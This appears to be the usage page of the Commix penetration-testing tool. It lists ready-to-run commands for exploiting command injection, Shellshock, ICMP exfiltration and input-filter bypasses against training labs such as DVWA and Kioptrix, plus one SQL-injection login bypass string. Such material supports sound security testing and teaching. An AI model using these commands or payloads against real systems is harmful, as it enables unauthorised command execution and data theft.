Commix

https://github.com/commixproject/commix

Commix (short for [comm]and [i]njection e[x]ploiter) is an open source penetration testing tool, written by Anastasios Stasinopoulos (@ancst), that automates the detection and exploitation of command injection vulnerabilities.

Usage Examples

1. Exploiting Damn Vulnerable Web App:

root@kali:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&Submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

2. Exploiting php-Charts 1.0 using injection payload suffix & prefix string:

root@kali:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" --prefix="'" --suffix="//"

3. Exploiting OWASP Mutillidae using extra headers and HTTP proxy:

root@kali:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

4. Exploiting Persistence:

  1. Using ICMP exfiltration technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"
  1. Using an alternative (python) shell:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python"

5. Exploiting Damn Vulnerable NodeJS Application (DVNA):

root@kali:~/commix# python commix.py --url "http://127.0.0.1:9090/app/ping" --data "address=127.0.0.1" --cookie="connect.sid=s%3AIdvte5ieuGQC5C8jt5aSyUTSF8xZtls8.3fwCVsyypx%2BLGXtiF1JTBrqbmjp%2B29vwKoL0uxcHub8" -v1

6. Exploiting Kioptrix: Level 1.1 (#2):

root@kali:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"

7. Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:

root@kali:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --root-dir="/"

8. Exploiting CVE-2014-6271/Shellshock:

root@kali:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock
root@kali:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"

10. Exploiting commix-testbed (user-agent) using ua-based injection:

root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/user-agent/ua(blind).php" --level=3

11. Exploiting commix-testbed (referer) using referer-based injection:

root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/referer/referer(classic).php" --level=3

12. Exploiting Flick 2 using custom headers and base64 encoding option:

root@kali:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64

13. Exploiting commix-testbed (JSON-based) using JSON POST data:

root@kali:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'

14. Exploiting SickOs 1.1 using shellshock module and HTTP proxy:

root@kali:~/commix# python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"

Filters Bypasses

Note: The following filters bypasses are based on dockerized version of Commix-testbed.

  1. Filter lax_domain_name.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/lax_domain_name.php" --data="addr=127.0.0.1" --prefix="a.b.c" --suffix="d.e.f"
  1. Filter nested_quotes.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/nested_quotes.php" --data="addr=127.0.0.1" --prefix="\"" --suffix="\""
  1. Filter no_space.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_space.php" --data="addr=127.0.0.1" --tamper="space2ifs"
  1. Filter no_space_no_colon_no_pipe_no_ampersand.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_colon_no_pipe_no_ampersand_no_dollar.php" --data="addr=127.0.0.1" --technique=f --web-root="/var/www/commix-testbed.com/public_html/" --tamper="space2htab"
  1. Filter no_space_no_colon_no_pipe_no_ampersand_no_dollar.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_space_no_colon_no_pipe_no_ampersand_no_dollar.php" --data="addr=127.0.0.1" --technique=f --web-root="/var/www/commix-testbed.com/public_html/" --tamper="space2htab"
  1. Filter no_colon_no_pipe_no_ampersand_no_dollar.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_colon_no_pipe_no_ampersand_no_dollar.php" --data="addr=127.0.0.1"
  1. Filter no_white_chars.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars.php" --data="addr=127.0.0.1" --tamper="space2ifs"
  1. Filter no_white_chars_start_alphanum.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars_start_alphanum.php" --data="addr=127.0.0.1" --tamper="space2ifs" --prefix="abc"
  1. Filter no_white_chars_stop_alnum.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars_stop_alnum.php" --data="addr=127.0.0.1" --tamper="space2ifs"
  1. Filter simple_stop_alphanum.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/simple_stop_alphanum.php" --data="addr=127.0.0.1" --prefix="abc"
  1. Filter simple_start_alphanum.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/simple_start_alphanum.php" --data="addr=127.0.0.1"
  1. Filter multiple_os_commands_blacklisting.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/multiple_os_commands_blacklisting.php" --data="addr=127.0.0.1" --tamper="uninitializedvariable"